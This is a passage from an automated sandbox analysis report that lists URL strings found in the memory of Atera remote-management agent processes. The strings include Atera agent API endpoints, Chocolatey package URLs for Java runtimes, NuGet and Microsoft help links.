00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C429F0000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B7A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.1981577832.0000021500135000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.1981546902.0000015E00079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResult
                                Source: AgentPackageTicketing.exe, 0000002C.00000002.3063046700.0000021400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResultRecurring/AgentPackageTicketingInstallHelp
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427D4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsFallback
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetEnvironmentStatus
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.000002163055F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages.
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/Trace
                                Source: AgentPackageInternalPoller.exe, 0000002F.00000002.2437952320.0000022B826A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/agentMonitoredDevices/52187e48-563c-468d-9785-3542f81fb
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE1D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/script-based
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/guiCommandResult
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE421000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE38A000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCommandResult
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2090670816.000001F71D50F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/thresholds/52187e48-563c-468d-9785-3542f81fb412
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004C01000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004CE6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.1807492407.0000000004D96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event;
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CA81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4E41F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4D8E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4E445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4E41F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4D8E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2059219762.0000022F4E445000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                                Source: AgentPackageTicketing.exe, 0000002C.00000002.3063046700.000002140007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.nuget.org
                                Source: AgentPackageTicketing.exe, 0000002C.00000002.3063046700.000002140007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.nuget.org/v3-flatcontainer/eo.webbrowser/24.1.46/eo.webbrowser.24.1.46.nupkg
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asciidoctor.org/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asciidoctor.org/docs/user-manual/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://asciidoctor.zulipchat.com/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aws.amazon.com/corretto/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bell-sw.com/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blog.adoptopenjdk.net/2021/03/transition-to-eclipse-an-update/)
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.openjdk.java.net/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/gh/IdealChain/chocolatey-packages
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.statically.io/gh/asciidoctor/brand/b9cf5e27/logo/logo-fill-color.svg
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocolatey.org/packages/adoptopenjdkjre):
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocolatey.org/packages/jre8)
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538047E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2972259017.00000153FD142000.00000002.00000001.01000000.00000048.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802B4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153804BF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538023D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153806F4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153804F1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocommunity.atera.com/api/v2/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153804BF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153801EC000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153806F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocommunity.atera.com/api/v2/$metadata
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802B4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153804BF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153806F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocommunity.atera.com/api/v2/Search()?$filter=IsApproved
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802B4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153804BF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153806F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chocommunity.atera.com/api/v2/Search()?$filter=IsApproved%20and%20IsLatestVersion&$orderby=D
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380680000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538047E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE542000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153806B7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802B4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153801EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/Search?searchTerm=
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurin11jre/11.0.25.9
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurin17jre/17.0.13.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurin21jre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurin8jre/8.432.6
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/Temurinjre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk11jre/11.0.11.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk11openj9jre/11.0.11.900
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk12jre/12.0.2.10tps:
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk14jre/14.0.2.1200
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk8jre/8.292.10.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdk8openj9jre/8.292.10
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdkjre/16.0.1.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/adoptopenjdkopenj9jre/16.0.1.900
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/asciidoctorj/2.5.13
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/corretto8jre/8.432.6.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/flyway.commandline.withjre/10.21.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/javaruntime-platformspecific/7.0.79.20161125
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/javaruntime/8.0.431
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/josm/19265.0.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/jre6/6.0.43
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/jre8/8.0.431
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/liberica17jre/17.0.13.12
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/libericajre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/openjdk11jre/11.0.16.20220913
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/openjdk8jre/8.342.07.20220913
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/server-jre/8.0.192
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/server-jre10/10.0.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/server-jre8/8.0.202
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/smartgit-with-jre/7.1.1
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/teamcity-preinstalledjre/2024.12.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/api/v2/package/teamcity/2024.12.0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurin11jre/11.0.25.9
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurin17jre/17.0.13.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurin21jre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurin8jre/8.432.6
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/Temurinjre/21.0.5.11
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk11jre/11.0.11.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk11openj9jre/11.0.11.900
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk12jre/12.0.2.10
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk14jre/14.0.2.1200
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk8jre/8.292.10.901
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdk8openj9jre/8.292.10
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.chocolatey.org/package/ReportAbuse/adoptopenjdkjre/16.0.1.901
